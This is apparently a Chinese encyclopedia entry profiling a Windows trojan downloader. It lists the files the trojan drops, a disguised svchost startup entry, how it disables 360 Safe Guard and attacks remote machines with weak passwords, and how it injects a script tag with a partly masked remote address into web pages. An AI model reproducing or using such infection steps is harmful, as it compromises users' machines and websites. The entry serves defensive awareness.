-
感染蟲下載器45056
鎖定
- 中文名
- 感染蟲下載器45056
- 威脅級別
- ★★☆☆☆
- 影響系統
- Win9x WinNT
- 啓動項名
- svchost
- 危 害
- 向遠程機器發送惡意數據
感染蟲下載器45056基礎信息
Win32.Troj.Downloader.c.45056
感染蟲下載器45056病毒名稱
感染蟲下載器45056病毒別名:
威脅級別:
★★☆☆☆病毒類型:
感染蟲下載器45056病毒長度
45056影響系統:
Win9x WinNT
感染蟲下載器45056病毒行為
1.病毒運行後,產生以下病毒文件
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.添加病毒啓動項
啓動項名:svchost 對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒會觸發taimpo.bat病毒文件,用來關閉"360安全衞士",使用户的安全性能降低.
4.病毒會檢測連接的遠程機器,當遠程機器的登錄木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到用户機器上.
5.遍歷磁盤,查找*.htm、*.PHP、*.ASP等網頁文件,開始感染,插入一段JS代碼:
script language=javascript src=http://218.**.**.248/qq.js
- 詞條統計
-
- 瀏覽次數:次
- 編輯次數:13次歷史版本
- 最近更新: 星V_S痕